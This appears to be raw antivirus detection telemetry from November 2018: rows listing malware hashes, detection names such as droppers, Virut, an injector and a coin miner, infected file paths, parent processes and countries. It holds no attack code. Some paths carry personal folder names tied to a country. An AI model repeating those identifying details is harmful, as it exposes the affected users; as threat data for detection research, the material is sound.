  Row(detection=Row(filename='6ef394ae1044c76635af953e313ccf2e791d16e5471a010cc68b5e00aeb33a2f', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\6EF394AE1044C76635AF953E313CCF2E791D16E5471A010CC68B5E00AEB33A2F', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='6ef394ae1044c76635af953e313ccf2e791d16e5471a010cc68b5e00aeb33a2f', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:22:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\lsass.exe', parentsize=None, timestamp='2018-11-02T01:16:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='1540585994132808932', filepath='C:\\Program Files (x86)\\DesktopCentral_DistributionServer\\DownloadRepository\\1540585994132808932', filesize=6288000, name='HEUR/AGEN.1003960.#M1.#R1'), hash='08bcb2fdd0ac8222ff6eed6ced1673327d6abe8a78134e27e1b13709f41b097c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-02T06:02:27Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:14:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:25:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:27:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:47:22Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ai.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL1\\AI\\AI.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='26da584ca5ab584d801c79fd3d022992fcc724b7169097d2e6dabdac0880f111', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:51:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-140457-b6fca73d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-140211-A771A7C2\\AVSCAN-20181102-140457-B6FCA73D', filesize=1088000, name='EXP/Excel.Exploit.Gen.#M1.#R1'), hash='46fca5e52395ecf0f3467a783e0bffb96a30de97377a885a87b67b367c7c014a', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T18:05:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:23:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:44:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:26:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:31:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0119532.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0119532.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:45:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:22:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:20:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0127182.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0127182.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2c9f9e2d93243fff2d209fb9bece4cc53c703688686962d69b3067c6546a729a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2C9F9E2D93243FFF2D209FB9BECE4CC53C703688686962D69B3067C6546A729A', filesize=2176000, name='HEUR/AGEN.1034483.#M1.#R1'), hash='2c9f9e2d93243fff2d209fb9bece4cc53c703688686962d69b3067c6546a729a', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:47:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120440-2b0025e2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b6cd8729\\AVSCAN-20181102-120406-257538A2\\AVSCAN-20181102-120440-2B0025E2', filesize=768000, name='PUA/Fusion.IB.#M1.#R1'), hash='0c129ee14f00a11b1dd41569b567a5985d55f78bd7fca000fc66a5ef9e97d7dc', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:04:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:56:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Users\\X\\Desktop\\MIGUEL ANGEL\\Users\\Megainfo1\\Desktop\\MEGARED GML\\WINDOWS\\system32\\dllcache\\wmplayer.exe', filesize=64000, name='TR/Dropper.Gen8.#M300.#R700255'), hash='1dec67dc23c158887f03ec5ec57b9555c9fa7a898da120e732d1cc86534bf15e', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\PowerDataRecovery\\PowerDataRecovery.exe', parentsize=2514944, timestamp='2018-11-02T09:46:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a0115529.exe', filepath='\\?\\H:\\System Volume Information\\_restore{FD8CA95C-615B-4BD2-B142-4564B27DDB35}\\RP2\\A0115529.EXE', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='08f001bff3c666a6f70c117695c9e6c1d7d58659e5e5c351f6c7ca204eca8718', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:43:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='rules_vp.exe', filepath='I:\\ألعاب\\Games 1\\Dd249\\res\\dialogues\\Rules_VP\\Rules_VP.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='24399e11e21162ea957a4849ac268a8224d22127c1f67fcecffc9dd2d2ef515d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='D:\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\SETUP.EXE', parentsize=1551000, timestamp='2018-11-02T10:55:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='004280fb-f050-5b78-a67f-aeca8b48d242.exe', filepath='F:\\{8f874700-3975-f09f-45a5-4b73ad2651eb}\\004280fb-f050-5b78-a67f-aeca8b48d242.exe', filesize=256000, name='TR/Dropper.Gen.#M300.#R4148'), hash='216d36a242cafd0951935727d497baeffb715f17f5c665a9f89073814a7f4a0c', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T10:56:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='j111.exe', filepath='J111.exe', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T16:30:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061206-31eb5505', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061206-31EB5505', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Compressed\\Setup\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads\\Compressed\\Setup\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T07:57:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-144549-b11caf06', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-144549-B11CAF06', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-141347-4c0e8f5c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-141347-4C0E8F5C', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:16:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-165644-0846afec', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_28e778da\\AVSCAN-20181102-165623-04633114\\AVSCAN-20181102-165644-0846AFEC', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='MY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:57:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051600-5b370298', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051600-5B370298', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:15:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054619-97ada44a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054619-97ADA44A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054215-061a6f85', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054215-061A6F85', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-113426-1c8d0de0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_91bd8850\\AVSCAN-20181102-113236-0BCE7E9D\\AVSCAN-20181102-113426-1C8D0DE0', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:37:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-122311-7b0c359e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-122311-7B0C359E', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:26:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050749-36ba1dee', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050749-36BA1DEE', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-133333-8b7f1846', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-133333-8B7F1846', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:36:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='airport.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\DATA\\MAPS\\AIRPORT\\AIRPORT.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='494844277621873581a54f2baae4fdf5bc8b3c77b85ae4b07d8c094ff7a9bed8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ehshell.exe', filepath='C:\\Windows\\ehome\\ehshell.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='5b3b718d72399ebaec59ad04a04d767bf96c5e9016fde51295d193c32d1fb1be', metadata=Row(cmdline='-k netsvcs', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T04:36:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\Downloads\\Compressed\\msimg32.dll', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Users\\X\\Downloads\\Compressed\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T06:25:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-133106-7028e661', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-133106-7028E661', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:34:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered notel', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered notel', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='66bf5e284a4da1edd06c0642be2278a0cafe63675b99bd29a587703cb431e6d7', metadata=Row(cmdline=None, country='CL', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T16:42:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052225-40de7a11', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052225-40DE7A11', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:22:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='documents.exe', filepath='C:\\Users\\X\\Documents\\Documents.exe', filesize=512000, name='W32/Virut.Gen.#M1.#R1'), hash='4f876be927448a884c219fa592dd4163cc19753a46a12152a34424e5c55e7582', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe11_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe11 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T08:30:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061406-7978ad06', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061406-7978AD06', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:14:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-123844-2864c6b7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_42dbc853\\AVSCAN-20181102-121318-0CECC81F\\AVSCAN-20181102-123844-2864C6B7', filesize=512000, name='DR/Vilsel.piv.#M1.#R1'), hash='6208423113ca13ddc8e33ac87cceed6837dc2232f1a698f8641e715dc5791dc4', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:41:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mnfxcgvq.exe', filepath='f:\\recycler\\s-3-3-13-3088836066-2100750757-868400721-7041\\mnfXCgVq.exe', filesize=1856000, name='TR/Offend.725658.#M1.#R1'), hash='501f5d130f21168f1530615de806173017ffe466b5d377a4f06d9111b9127be7', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:25:49Z'), dt=datetime.date(2018, 11, 2)),
